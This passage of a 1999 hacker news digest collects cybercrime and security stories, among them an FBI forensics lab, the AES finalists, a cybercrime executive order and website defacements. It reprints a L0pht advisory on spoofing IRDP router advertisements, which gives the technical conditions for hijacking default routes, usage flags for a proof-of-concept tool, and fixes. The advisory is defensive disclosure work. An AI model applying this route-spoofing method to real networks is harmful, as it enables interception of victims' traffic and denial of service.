The San Diego lab's staff members, who completed their FBI training seven
weeks ago, are now working in temporary quarters until work on the new
facility is completed in the next month or so.
"What they're doing right now is developing the protocols and processes that
will be applied to any case," Dembin said. "We're already receiving inquiries
from all over country . . . which is interesting since we haven't prosecuted a
single case yet."
The interest prompted Dembin to organize a session about the San Diego lab
during the High Technology Crime Investigation Association's annual meeting,
to be held in San Diego's Town & Country Convention Center next month.
The regional lab will help set forensic standards for local investigators and
provide guidance in the way search warrants are served, computers are
seized and data is retrieved for evidence at trial, said Bill Gore, who
supervises the FBI office in San Diego.
"We've been pretty lucky, I think, because so far the defense attorneys
haven't really homed in on the procedures that we use," said Gore.
The presentation of computerized data at trial can be as complex as DNA
evidence, he added.
The lab's investigators also are expected to deal with tricky investigations,
such as a handful of employees who are using a corporate computer network
for illegal activities.
The "courts are reluctant to let the U.S. attorney shut down a business" by
seizing control of a company's entire computer system, Dembin said, "so we
have to come up with tools that minimize our interference with commerce."
For Dembin and other prosecutors, however, a more practical problem
stemmed from protracted delays in the analysis of computer-based evidence
seized in cases that ranged from securities fraud to drug crimes.
"There's been a bottleneck in analyzing computer or electronic evidence," said
Schindler, who usually works with FBI forensics experts in Los Angeles.
Said Dembin: "Putting aside the question of whether the forensics was done
right, cases were getting disposed of before the seized computers were even
analyzed."
Dembin's first brush with computer crime occurred in 1991, when he
prosecuted a disgruntled employee who tried to sabotage General Dynamics
computers in San Diego with a "logic bomb."
Since then, the 45-year-old prosecutor has handled his own share of
malicious hacker cases. Over the past eight years, Dembin also saw how con
artists converted their telemarketing scams into Internet schemes, and he
oversaw bank fraud cases that relied on computerized financial records.
"Now more and more the only place where documentary evidence exists is on
the computer," Dembin said. "People are keeping their personal records of
everyday activities on their computers, and criminal society is no different."
Copyright 1999 Union-Tribune Publishing Co.
11.0 University Sys Admin Faced with 10 Years for Using Too Much Bandwidth
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by evenprime
A former University of Oklahoma systems administrator
has been charged with using too much bandwidth. He
faces a single count of disrupting the universities
internet service after he allegedly set up a warez site
on the University owned servers. While not charged with
piracy or copyright infringement the local DA decided to
prosecute under the Oklahoma Computer Crimes Act of
1984 which states that it is a felony to "willfully and
without authorization disrupt or cause the disruption of
computer services or deny or cause the denial of access
or other computer services to an authorized user of a
computer, computer system or computer network." He
faces up to 10 years in the state penitentiary and up to
$100,000 in fines. (So now it is a crime to have a
popular site? This article fails to mention if this person
was a legitimate user of the network to begin with.)
ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2310624,00.html
--------------------------------------------------------------
This story was printed from ZDNN,
located at http://www.zdnet.com/zdnn.
--------------------------------------------------------------
Disrupting Net access a cybercrime?
By Robert Lemos, ZDNN
August 6, 1999 3:28 PM PT
URL: http://www.zdnet.com/zdnn/stories/news/0,4586,2310624,00.html
A former system administrator of the University of Oklahoma has been charged under the state's
computer-crime statutes with slowing the university's network to a crawl.
Ryan Breding, 25, faces a single count of disrupting the university's Internet service in 1997, when
hoards of incoming students downloaded pirated software from servers that he had allegedly set
up on the university's network.
"There were times when the authorized users -- students -- were not able to access the Internet at
all," said Scott Palk, first assistant attorney general for Oklahoma's Cleveland County District
Attorney's Office.
Known as warez (pronounced "wares"), the software is identical to store-bought versions and
includes serial numbers to spoof the copy protection mechanisms. The downloads overloaded the
network, and many students were denied access.
Getting up to speed
While distributing such software is illegal, the district attorney's office has only charged Breding
with interfering with network operation. On that charge alone, the former employee faces up to 10
years in the state penitentiary and up to $100,000 in fines.
The Oklahoma Computer Crimes Act of 1984 makes it a felony to "willfully and without
authorization disrupt or cause the disruption of computer services or deny or cause the denial of
access or other computer services to an authorized user of a computer, computer system or
computer network."
An initial lack of familiarity with computer crimes stymied the investigation. State investigators and
prosecutors needed to learn how to pursue digital criminals and examine the evidence.
"These are new crimes -- at least locally," said Palk. "Some people had to undergo training to look
into it."
Palk stressed that, for the investigators, the case was a necessary learning experience. "This may
be a hallmark of things to come," he said. "And we need to be ready."
University officials would not comment for this story. A preliminary hearing is set to start on Aug.
17.
@HWA
12.0 Chaos Computer Camp Fun For All Last Weekend
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by turtlex
A computer, some beer, cyber friends, warm grass and a
new moon, what more could you ask for? Chaos
Computer Club Camp wrapped up over the weekend,
people are saying it was the most fun they have had
since HIP.
Wired
http://www.wired.com/news/news/culture/story/21159.html
(Printed in last issue)
13.0 NIST Announces the AES Finalist Candidates
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by evilwench
Five encryption technologies have made the final cut to
be the next standard cryptographic mechanism used to
protect sensitive government information. It has taken
over a year to whittle the initial field of twelve entries
down to five, one of which will replace DES, the current
standard. The final standard is expected to be chosen
by the Summer of 2001. The five finalists for the
advanced encryption standard (AES), where named by
the National Institute of Standards and Technology on
Monday. The five finalists are MARS, RC6TM, Rijndael,
Serpent, and Twofish.
Advanced Encryption Standard (AES) Development Effort
http://www.nist.gov/aes
Federal Computer Week
http://www.fcw.com:80/pubs/fcw/1999/0809/web-nist-8-9-99.html
ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,1015886,00.html
FCW;
AUGUST 9, 1999 . . . 16:15 EDT
NIST names finalists in AES development
BY DIANE FRANK (dfrank@fcw.com)
The National Institute of Standards and Technology today named the five
finalists in its development of the next-generation Advanced Encryption
Standard.
NIST has been working with 15 candidates from 12 countries for the past
year to test their submissions for the AES algorithm. NIST will use AES to
replace the Data Encryption Standard adopted in 1977 as a federal
information processing standard for federal agencies.
The five finalists are
MARS, developed by IBM Corp., Armonk, N.Y.
RC6, developed by RSA Laboratories, Bedford, Mass.
Rijndael, developed by Joan Daemen and Vincent Rijmen of Belgium.
Serpent, developed by Ross Anderson, Eli Biham and Lars Knudsen of the
United Kingdom, Israel and Norway, respectively.
Twofish, developed by Bruce Schneier, John Kelsey, Doug Whiting, David
Wagner, Chris Hall and Niels Ferguson, most of whom are associated with
Counterpane Systems, Minneapolis, Minn.
All of the candidate algorithms support cryptographic key sizes of 128, 192
and 256 bits and were tested by NIST and other cryptographic groups
around the world.
A full report on the process is available on the AES World Wide Web site at
www.nist.gov/aes.
-=-
ZDNET;
--------------------------------------------------------------
This story was printed from ZDNN,
located at http://www.zdnet.com/zdnn.
--------------------------------------------------------------
Finalists for new crypto standard named
By Jim Kerstetter, PC Week
August 9, 1999 1:05 PM PT
URL: http://www4.zdnet.com/zdnn/stories/news/0,4586,1015886,00.html?chkpt=hpqs014
DES is a step closer to the dustbin.
The U.S. Commerce Department's National Institute of Standards and Technology (NIST) today
announced five finalists in the two-year competition to find a replacement for the Data Encryption
Standard, which has served as the government's basic encryption standard since 1977.
The replacement, to be called the Advanced Encryption Standard (AES), should be completed by
the summer of 2001, according to NIST.
The five finalists include:
MARS, developed by IBM in Armonk, NY. IBM researchers also created DES back in
the '70s.
RC6, developed by Ron Rivest (inventor of the RSA public key algorithm and several other
well-known hashing and private key algorithms) and RSA Laboratories in Bedford, Mass.
Rijndael, developed by Joan Daemen and Vincent Rijmen of Belgium.
Serpent, developed by Ross Anderson, Eli Biham and Lars Knudsen of the United
Kingdom, Israel and Norway.
Twofish, developed by Bruce Schneier, John Kelsey, Doug Whiting, David Wagner, Chris
Hall and Niels Ferguson of Counterpane Systems in Minneapolis. Schneier also developed
the popular Blowfish symmetric algorithm.
Resisting brute force
DES -- as well as its replacement, AES -- is what cryptographers call a symmetric or private key
algorithm. A symmetric algorithm requires that both parties receiving encryption have a copy of the
same encryption key in order to read the scrambled data. It is also likely the most widely used
encryption algorithm in the world today, supported by most commercial encryption products.
But DES has proven to be easy prey for modern technology. It uses keys of 56 bits, which were
first broken nearly three years ago. In January 1999, cryptographers using a special DES-cracking
machine, along with a nationwide network of PCs, were able to crack DES in less than 24 hours.
The crackers used a "brute force" method of attack to solve the mathematical factoring behind
DES. In other words, they put a lot of processing horsepower against the algorithm and were able
to solve it -- something that has been feasible only in the last couple of years because of
improvements in chip technology.
AES on the scene
Enter the AES. NIST first requested proposals for the AES in September 1997. Each of the
candidate algorithms supports key sizes of 128, 192 and 256 bits. A 128-bit key cannot be
broken using known technology today. Each added bit essentially doubles the key strength.
RSA Data Security Inc. CEO Jim Bidzos used the following analogy at the company's conference
in January: A 40-bit key is the water that fills a spoon. A 56-bit key is the water that fills a small
swimming pool. A 128-bit key would be all of the water on the planet.
"The process has always been about standardization," said Counterpane's Schneier. "AES will be
the encryption standard for the next 20 or so years, and hence will be used in applications that we
can't imagine. If a single algorithm is to be chosen for AES, it must be efficient in all current and
imagined applications."
NIST will make the five finalist algorithms publicly available. Analysis of the finalists will be
presented at a conference in April 2000, and public comments will be accepted until May 15,
2000, according to the NIST.
@HWA
14.0 Clinton Designates Group to Look At CyberCrime
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Ryan
On Saturday August 7th, President Clinton issued an
executive order to establish a working group to examine
unlawful conduct on the internet. The group is to
determine if current laws are adequate to combat online
crime such as child pornography and sales of illegal
drugs. The executive order also calls for closer
examination of the tools used by law enforcement to
investigate these crimes. This could be interpreted as a
major call for key escrow. The group has been ordered
to complete its reports within 120 days.
US Newswire- Text of Executive Order
http://www.usnewswire.com/topnews/Current_Releases/0807-107.htm
ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2311209,00.html
Wired
http://www.wired.com/news/news/politics/story/21191.html
Executive order;
Text of Clinton Executive Order on Internet Conduct
U.S. Newswire
7 Aug 11:07
Text of Clinton Executive Order Establishing Working Group to
Examine Unlawful Conduct on the Internet
To: National Desk
Contact: White House Press Office, 202-456-2100
WASHINGTON, Aug. 7 /U.S. Newswire/ -- The following is the
text of an Executive Order released today by President Clinton:
EXECUTIVE ORDER
- - - - - - -
WORKING GROUP ON UNLAWFUL CONDUCT
ON THE INTERNET
By the authority vested in me as President by the Constitution
and the laws of the United States of America, and in order to
address unlawful conduct that involves the use of the Internet,
it is hereby ordered as follows:
Section 1. Establishment and Purpose.
(a) There is hereby established a working group to address
unlawful conduct that involves the use of the Internet ("Working
Group"). The purpose of the Working Group shall be to prepare
a report and recommendations concerning:
(1) The extent to which existing Federal laws provide a
sufficient basis for effective investigation and prosecution
of unlawful conduct that involves the use of the Internet, such
as the illegal sale of guns, explosives, controlled substances,
and prescription drugs, as well as fraud and child pornography.
(2) The extent to which new technology tools, capabilities,
or legal authorities may be required for effective investigation
and prosecution of unlawful conduct that involves the use
of the Internet; and
(3) The potential for new or existing tools and capabilities
to educate and empower parents, teachers, and others to prevent
or to minimize the risks from unlawful conduct that involves
the use of the Internet.
(b) The Working Group shall undertake this review in the context
of current Administration Internet policy, which includes support
for industry self-regulation where possible, technology-neutral
laws and regulations, and an appreciation of the Internet as
an important medium both domestically and internationally for
commerce and free speech.
Sec. 2. Schedule. The Working Group shall complete its work
to the greatest extent possible and present its report and
recommendations to the President and Vice President within 120
days of the date of this order. Prior to such presentation,
the report and recommendations shall be circulated through the
Office of Management and Budget for review and comment by all
appropriate Federal agencies.
Sec. 3. Membership.
(a) The Working Group shall be composed of the following
members:
(1) The Attorney General (who shall serve as Chair of the
Working Group).
(2) The Director of the Office of Management and Budget.
(3) The Secretary of the Treasury.
(4) The Secretary of Commerce.
(5) The Secretary of Education.
(6) The Director of the Federal Bureau of Investigation.
(7) The Director of the Bureau of Alcohol, Tobacco and
Firearms.
(8) The Administrator of the Drug Enforcement Administration.
(9) The Chair of the Federal Trade Commission.
(10) The Commissioner of the Food and Drug Administration;
and
(11) Other Federal officials deemed appropriate by the
Chair of the Working Group.
(b) The co-chairs of the Interagency Working Group on Electronic
Commerce shall serve as liaison to and attend meetings of the
Working Group. Members of the Working Group may serve on the
Working Group through designees.
WILLIAM J. CLINTON
THE WHITE HOUSE,
August 5, 1999.
-0-
/U.S. Newswire 202-347-2770/
08/07 11:07
Copyright 1999, U.S. Newswire
-=-
ZDNET;
--------------------------------------------------------------
This story was printed from ZDNN,
located at http://www.zdnet.com/zdnn.
--------------------------------------------------------------
Clinton establishes Net crime taskforce
By Maria Seminerio, ZDNN
August 9, 1999 12:50 PM PT
URL:
UPDATED 3:30 PM PT
President Clinton on Saturday established a working group to address cybercrimes, including
online sales of illegal drugs and explosives, and online child pornography trafficking.
The working group is charged with determining whether existing federal laws are sufficient to
combat Internet-related crime.
Also, in what seems like a call for widespread key escrow for encrypted communications, Clinton
ordered the task force to determine "the extent to which new technology tools, capabilities or legal
authorities may be required for effective investigation and prosecution of unlawful conduct" online.
The issue of key escrow -- allowing law enforcement a guaranteed "back door" into encrypted
online messages -- is hugely controversial, and has been a central bone of contention in the debate
over the Clinton administration's encryption export policies. The director of the Federal Bureau of
Investigation, Louis Freeh, is a vocal supporter of key escrow, but online privacy advocates
believe any such plan would be disastrous for individual Internet users.
"It's a valid concern," said David Sobel, general counsel at the Electronic Privacy Information
Center, when asked whether the move is a precursor to a more aggressive key escrow push.
Why no wider investigation?
With the controversy over illegal Internet porn and online drug and gun sales having sizzled for
some time, Sobel said it's unclear why the White House should now launch a wider investigation.
It's also unclear what action, if any, Clinton will take after the group completes its report, a White
House spokesman told ZDNN Monday.
Clinton could urge Congress to pass new Net crime laws, although there is no specific plan for him
to do so, the spokesman said.
Another administration official, speaking on condition of anonymity, said the task force's work
won't be specifically aimed at the key escrow issue.
"We just wanted to take a step back and see what new laws, if any, are needed" to address
cybercrimes, the official told ZDNN.
The task force will include Freeh, Attorney General Janet Reno, and other federal officials, such as
the director of the Office of Management and Budget, the Secretary of the Treasury, the
Commerce Secretary and the director of the Bureau of Alcohol, Tobacco and Firearms. The
co-chairs of the Advisory Commission on E-Commerce will serve as liaisons.
Clinton ordered the group to complete a report within 120 days, and many federal agencies will
have a chance to respond before it is made public.
-=-
Wired;
Plan B for Cyber Space
Wired News Report
5:00 p.m. 9.Aug.99.PDT
President Clinton has asked his advisers to come up with new ways to combat illegal online activity including child porn and the sale of guns, drugs,
and explosives.
In announcing a new working group on unlawful conduct on the Internet, the Administration stopped short of calling for new laws. Instead, Vice
President Gore said the feds may need new technology tools, capabilities, or legal authorities to fight cybercrime.
"What we need to do is find new answers to old crimes," said Gore in a statement released Friday.
About 11 federal agencies will participate in the working group, including the Bureau of Alcohol, Tobacco, and Firearms; the FBI; the Commerce
Department; the Food and Drug Administration; and the Drug Enforcement Agency.
Each agency will solicit ideas for deterring cybercrime from the private sector and from state and local law enforcement officials.
"The working group will help to make the Internet a safe place for all Americans by examining the extent to which existing federal law and
technological tools are effective in combating crime on the Internet," Gore said.
The working group will make its recommendations in four months in the context of current policies and principles. Among those principles: that
industry should self-regulate, that laws should be technology-neutral, and that the Internet is an important medium for commerce and free speech.
The administration announced the new strategy only weeks after lawmakers and privacy activists panned a Clinton-approved plan to develop a
nationwide surveillance network.
That proposed network, recommended by the White House National Security Council and known as the Federal Intrusion Detection Network
(Fidnet), sought to fight cybercrime by vacuuming up electronic signals.
Prominent House republicans slammed that plan. House Majority Leader Dick Armey warned that the Fidnet could grow into an "Orwellian" system.
@HWA
15.0 Taiwan Government Web Sites Defaced
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Weld Pond
Several Taiwanese government web sites have been
defaced by someone claiming to be from the Hunan
province in China. The defacements contained political
statements, in Chinese and English, concerning Taiwan's
political status. An unidentified official said that he did
not think that firewalls where necessary on public web
servers.
Excite News
http://news.excite.com/news/r/990809/02/net-taiwan-hacker
Pro-China Hacker Attacks Taiwan Govt. Web sites
Updated 2:58 AM ET August 9, 1999
TAIPEI, Taiwan (Reuters) - A person claiming to be from mainland China hacked into several Taiwan government Internet sites
to insert pro-China messages amid a heated row between the two sides over Taiwan's political status.
"Only one China exists and only one China is needed," read a message inserted Sunday into the Web site of the Control Yuan
-- Taiwan's highest watchdog agency.
In apparent references to President Lee Teng-hui's controversial call for "special state-to-state" ties between Taiwan and China,
the message said Taiwan was and would always be an inseparable part of China.
"The Taiwanese government headed by Lee Teng-hui can not deny it."
The same messages -- in Chinese and English -- were placed in several other government Web sites, a Control Yuan official
said Monday.
"It looks like it was the same person who claimed to come from Hunan province," the official, who declined to be identified,
said by telephone.
The official said public Web sites were relatively easy to hack into.
"It is a public Web site containing open information, so we didn't think firewalls were necessary," the official said. "Now we
know it's a problem and we will fix it in the next few days."
Firewalls are electronic security screens.
Lee's redefinition of cross-strait ties has infuriated Beijing, which views the island as a wayward province and vows to bring it
under mainland rule, by force if necessary.
@HWA
16.0 DoD Ordered to Change All Passwords
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Sarge
The Defense Department has ordered all administrative
and user passwords on their unclassified networks to be
changed. The official reason is to protect against
possible Y2K cyber attacks. Rumours indicate that this
order may be the result of recent computer security
breaches.
Federal Computer Week
http://www.fcw.com:80/pubs/fcw/1999/0809/fcw-newsdod-08-09-99.html
AUGUST 9, 1999
DOD: Change Passwords
BY DANIEL VERTON (dan_verton@fcw.com)
Concerned that efforts to fix computer systems for the Year 2000 problem
may expose its information infrastructure to cyberattacks, the Defense
Department has ordered its network managers to change all administrative and
user passwords on their unclassified networks.
The order is the result of mandatory guidance issued last month to all of the
military services' network security organizations by the Joint Task Force for
Computer Network Defense. While a JTF-CND spokesperson could not
confirm or deny rumors that the guidance may be the result of a recent breach
of computer security, the spokesperson said that the FBI's National
Infrastructure Protection Center is currently investigating intrusions into
unclassified DOD networks.
"We're trying to start a better process for password protection," the
spokesperson said. "We gave [our components and other DOD
organizations] several weeks to do this [because] we know it can't be done
overnight."
The JTF-CND, which was formed last December, serves as the focal point
for DOD to organize the defense of DOD computer networks and systems.
When cyberattacks are detected, the JTF-CND is responsible for directing
departmentwide defenses to stop or contain damage and restore DOD
network functions operations.
The mandatory actions called for by the JTF-CND directive include changing
all administrative and user passwords for all unclassified systems and then
restarting the operating systems for systems that are connected to the
network. The process is known as a "warm boot" and is not a full shutdown of
the system, the spokesperson said.
Major commands affected by the guidance and responsible for managing
compliance in their respective services include the Air Force Information
Warfare Center, the Army's Land Information Warfare Activity, the Defense
Information Systems Agency, the Marine Corps' Marine Forces-CND and
the Navy Component Task Force-CND.
As a result of the directive, the NCTF-CND issued classified and unclassified
messages ordering password changes. However, a spokesman for the Space
and Naval Warfare Systems Command, one of the primary recipients of the
message, declined to comment because of the sensitivity of the message's
content.
In an administrative message issued last week by the NCTF-CND, the Navy
offered technical guidance to system administrators on how to deal with the
lack of password date-change tracking functionality in Microsoft Corp.'s
Windows NT.
As a result, the Navy has made three software tools available over the Internet
to help administrators automate the enforcement of password changes.
In May, Art Money, senior civilian official acting as the assistant secretary of
Defense for command, control, communications and intelligence, issued a
DOD-wide memorandum about the potential threat to DOD networks posed
by the Year 2000 computer problem. In that memo, Money cited DOD
Administrative Instruction 26, which provides specific guidance on the use of
passwords.
A DOD spokesperson said there is "no inherent connection between the May
5 Money memo and the July 23 [JTF-CND] message -- other than they are
related in the context of the department constantly putting out guidance that
requires vigilance over our networks."
@HWA
17.0 Belgians Under Cyber Attack From One Man
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by superman
ReDatAck, a Belgian man, has claimed to have broken
into the database of Skynet, owned by Belgian
state-run telecommunications operator Belgacom, and
accessed private information on over 1,000 users. The
information allegedly includes credit card numbers and
passwords. ReDatAck has also claimed to have broken
into the free address book server of Lycos. ReDatAck
has said that he is trying to alert people to the security
weaknesses of the internet.
Yahoo News
http://dailynews.yahoo.com/h/nm/19990809/wr/belgium_hacker_1.html
Monday August 9 12:38 PM ET
Belgian Hacker Warns Of Internet Security Risk
BRUSSELS (Reuters) - A computer hacker who broke into Belgium's
leading Internet access provider vowed Monday to carry on attacking
Web sites and databases in a bid to alert Belgium to the security risks
of the Internet.
``ReDatAck'', a man in his twenties, told Reuters by telephone he had
broken into the database of Skynet, owned by Belgian state-run telecomm-
unications operator Belgacom, Friday night and obtained secret information
on over 1,000 users.
``I have...their Visa (credit card) numbers and expiration dates, their
login and passwords, access to their Web sites,'' ''ReDatAck'' said, stressing
he wanted to `wake up Belgium'' to the Internet's security risks rather
than misuse the information.
``Nobody thinks about security,'' he said.
Skynet director Philippe Lemmens said Monday he planned to file a complaint
against ``ReDatAck'' and assured users that security had been stepped up against
future hackers.
But ``ReDatAck'', who claimed he had also broken into the free address book server
of U.S. Internet portal Lycos, was undeterred.
``I'll go on hacking. They can try to find me. It doesn't scare me. If they do find
me, it will make more publicity,'' he said, adding that he was currently working on
breaking into a hospital database. He declined to say which hospital.
@HWA
18.0 IRDP Hole in Win and Sol Leave Users Open to Attack
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Silicosis
By spoofing IRDP Router Advertisements, an attacker
can remotely add default route entries on a remote
system, including most Windows machines and some
Solaris systems. The attackers default route entry will
be preferred over the DHCP servers default route. DHCP
addressing is used by many corporations, cable modem
systems, and dialup ISPs. This attack significantly
increases a users risk to passive snooping,
man-in-the-middle attacks, and denial of service
attacks.
L0pht Heavy Industries - Full advisory with sample code and patches
http://www.l0pht.com
L0pht Security Advisory
Release date: August 11, 1999
Vulnerable: Microsoft Windows95a (w/winsock2), Windows95b
Windows98, Windows98se and Sun Microsystems
SunOS & Solaris operating systems.
Severity: Attackers can remotely add default route entries
on the victims host.
Status: Microsoft contacted, fix provided.
Author: sili@l0pht.com
URL: http://www.L0pht.com/advisories.html
Source code: http://www.l0pht.com/advisories/rdp.tar.gz
code written by Silicosis & Mudge
I. Problem
----------
The ICMP Router Discovery Protocol (IRDP) comes enabled by default on
DHCP clients that are running Microsoft Windows95 (w/winsock2),
Windows95b, Windows98, Windows98se, and Windows2000 machines. By
spoofing IRDP Router Advertisements, an attacker can remotely add default
route entries on a remote system. The default route entry added by the
attacker will be preferred over the default route obtained from the DHCP
server. While Windows2000 does indeed have IRDP enabled by default, it
less vulnerable as it is impossible to give it a route that is preferred
over the default route obtained via DHCP.
SunOS systems will also intentionally use IRDP under specific
conditions. For Solaris2.6, the IRDP daemon, in.rdisc, will be started
if the following conditions are met:
. The system is a host, not a router.
. The system did not learn a default gateway from a
DHCP server.
. The system does not have any static routes.
. The system does not have a valid /etc/defaultrouter
file.
It should be noted that the important point of this advisory is not
that ICMP Router Solicitation and Advertisement packets have no
authentication properties. Yes, this is a problem but it has long been
known. The dangerous aspect comes in various MS platforms enabling
this protocol and believing it _even when the DHCP setup specifies
router information_ (ie the operating system does this even though
you believe you are telling it NOT TO).
The tool provided with this advisory is the basis of what would
be used for everything from web page hacks, stealing credentials,
modifying or altering data, etc. involving vulnerable systems.
We believe most cable modem DHCP clients and large internal
organizations are at risk.
II. Risks
---------
The ICMP Router Discovery Protocol does not have any form of
authentication, making it impossible for end hosts to tell whether or not
the information they receive is valid. Because of this, attackers
can perform a number of attacks:
Passive monitoring: In a switched environment, an attacker
can use this to re-route the outbound traffic of
vulnerable systems through them. This will allow
them to monitor or record one side of the
conversation.
* For this to work, and attacker must be on the
* same network as the victim.
Man in the Middle: Taking the above attack to the next level, the
attacker would also be able to modify any of the
outgoing traffic or play man in the middle.
By sitting in the middle, the attacker can act as
a proxy between the victim and the end host. The
victim, while thinking that they are connected directly
to the end host, they are actually connected to the
attacker, and the attacker is connected to the end
host and is feeding the information through. If
the connection is to a secure webserver that uses SSL,
by sitting in the middle, the attacker would be able
to intercept the traffic, unencrypted.
A good example of this risk is on-line banking;
an attacker playing man-in-the-middle would be able
to intercept all of the banking information that
is relayed, without the victim's knowledge.
* For this to work, and attacker must be on the
* same network as the victim.
Denial of Service: Remote attackers can spoof these ICMP packets and
remotely add bad default-route entries into a
victims routing table. Because the victim's
system would be forwarding the frames to the
wrong address, it will be unable to reach other
networks.
Unfortunately, DHCP has quickly become popular and is
relied upon in most companies. In some cases, such as
cable & *DSL modems, users are required to use DHCP.
Because of the large number of vulnerable systems,
and the fact that this attack will penetrate firewalls
that do not stop incoming ICMP packets, this Denial
of Service attack can become quite severe.
It should be noted that the above attacks are documented in Section 7,
of RFC 1256. However, the RFC states states that the attacks are
launched by an attacker on the same network as the victim. In the Denial
of Service attack, this is not the case; an attacker can spoof IRDP
packets and corrupt the routing tables on systems that are on remote
networks.
While these attacks are not new, the fact that Windows95/98 DHCP
clients have been vulnerable for years, is. On systems running SunOS &
Solaris, it is easy to find documentation on IRDP by looking at the
startup scripts or manpages. On Windows95/98, however, information
has only become recently available in the Knowledge Bank.
III. Technical Details
----------------------
Upon startup, a system running MS Windows95/98 will always send 3 ICMP
Router Solicitation packets to the 224.0.0.2 multicast address. If the
machine is NOT configured as a DHCP client, it ignores any Router
Advertisements sent back to the host.
However, if the Windows machine is configured as a DHCP client, any
Router Advertisements sent to the machine will be accepted and processed.
Once an Advertisement is received, Windows checks to see how many Gateway
entries the packet contains. If the packet contains only 1 entry, it
checks to make sure the IP source address of the Advertisement is inside
the hosts subnet. If it is, the Router Address entry inside the
advertisement is checked to see that it is also within the host's subnet.
If so, a new default route entry is added. If the address is outside the
subnet, it the advertisement is silently ignored.
If a host receives a Router Advertisment that contains 2 or more Router
Addresses, the host will processes the packet even though the IP source
address is not local. If the host finds a Router Address inside the
advertisement that is inside the host's subnet, it will add a default
route entry for it.
Because the host does not care about the IP source address of the
Advertisement as long as it has more than one entry, attackers can now
create bogus IRDP packets that will bypass anti-spoofing filters.
Before the host can add a new default route entry, it has to determine
the route metric. On Windows95/98, normal default route entries obtained
from a DHCP server have a metric of 1. In order to determine the metric
for the default route entry obtained via IRDP, the Windows host subtracts
the Advertisement's Preference value from 1000. By creating an ICMP
Router Advertisement with a preference of 1000, the default gateway route
added will have a metric of 0, making it the preferred default route.
By adjusting the Lifetime value in the advertisement, an attacker can
adjust how many seconds the gateways are valid for.
IV. Fixes / Work-arounds
------------------------
Firewall / Routers:
Block all ICMP Type 9 & Type 10 packets. This should protect
against remote Denial of Service attacks.
Windows95/98:
The Microsoft Knowledge Base contains an article that gives info
on how to disable IRDP. It can be found at:
http://support.microsoft.com/support/kb/articles/q216/1/41.asp
Brief Summary of article:
IRDP can be disabled manually by adding "PerformRouterDiscovery"
value name and setting it to a dword value of 0, under the
following registry key(s):
HKLM\System\CurrentControlSet\Services\Class\NetTrans\####
Where #### is the binding for TCP/IP. More than one TCP/IP
binding may exist.
Solaris:
Configure your host to obtain a default gateway through DHCP,
static routes, or via the /etc/defaultrouter file. For more
information on IRDP refer to in.rdisc's man-page.
V. Detection
-------------
L0pht has released a NFR Intrusion Detection Module to detect both
Router Solicitations and Advertisements. You can find it at:
http://www.l0pht.com/NFR
NFR information can be found at http://www.nfr.net
VI. Source Code
-----------
L0pht is making available Proof-of-Concept code that will let individuals
test their systems & firewalls.
The source code can be found at: http://www.l0pht.com/advisories/rdp.tar.gz
Usage is fairly straight forward:
Usage: rdp -v -l -s -d <delay> -p <pref> -t <lifetime> -i <dev>
-S <src> -D <dst> -R <rtr> -r <optional 2nd rtr>
-v verbose
-l listen mode
-s send mode
-d <delay time between sending packets>
-n <number of rdp packets to send>
-I <ID value to place in IP packet>
-p <preference level>
-t <lifetime>
-i <interface to use for sniffing>
-S <source address to put in outgoing rdp packet>
-D <destination address to put in outgoing rdp packet>
-R <router address to advertise in rdp packet>
-r <optional 2nd router address to advertise in rdp packet>
Misc software notes:
Listen Mode: Software listens for ICMP Router Solicitations. If the
'-s' flag is specified as well, the software will answer
the Solicitations with ICMP Router Advertisements.
Preference: If the preference is not specified, it will use a default
of 1000, which will give the default route a metric of 0
on affected Windows systems.
2nd Router Addr: By using the '-r' flag and specifying a second router address
entry, the packet can contain a bogus source address and still
be processed for correct gateway entries by the end host.
@HWA
19.0 More Government Sites Defaced
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Code Kid
The Federal Energy Regulatory Commission has had its
web page defaced by someone known as 'Sarin' FERC is
a government agency that regulates the transmission
and sale of oil, natural gas, electricity and regulates
hydroelectric projects. The web page defacement called
for the replacement of the administrator of the site.
Also recently defaced was the U.S. Department of
Commerce Institute for Telecommunication Sciences.
This site was defaced by 'Pakistan Hackerz Club' the
page they left behind claimed to own America and
threatend additional nuclear tests unless Pakistan's
internal affairs are not messed with.
HNN Cracked Pages Archive
http://www.hackernews.com/archive/crackarch.html
ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2312517,00.html
--------------------------------------------------------------
This story was printed from ZDNN,
located at http://www.zdnet.com/zdnn.
--------------------------------------------------------------
Another Fed Web site knocked out
By Charles Cooper, ZDNN
August 10, 1999 11:01 PM PT
URL:
The Web site for the Federal Energy Regulatory Commission was hacked Tuesday night.
Instead of the usual bureaucratic greetings found on government Web sites, people attempting to
access the page were met by a cartoon character of a female vamp holding a whip.
The hack, which was claimed by "Sarin," also left a brief note, taunting administrators for leaving
their site vulnerable to hacks after "widespread publicity" given to copycat attacks in the last
several months.
"I'd seriously consider hiring a new admin if I were you," Sarin wrote.
It was unclear when the Web site went down, but in an e-mail to ZDNN at 7:56 PM Pacific Time,
Sarin wrote, "Does anyone care I have complete control over the Federal Energy Regulatory
Commission?"
Attempts to reach Sarin for comment were not immediately successful.
Hackers intent on teaching sloppy system administrators an embarrassing lesson have carried out
attacks against numerous federal Web sites this year, most prominently those operated by NASA,
the National Oceanic and Atmospheric Administration and the United States Army.
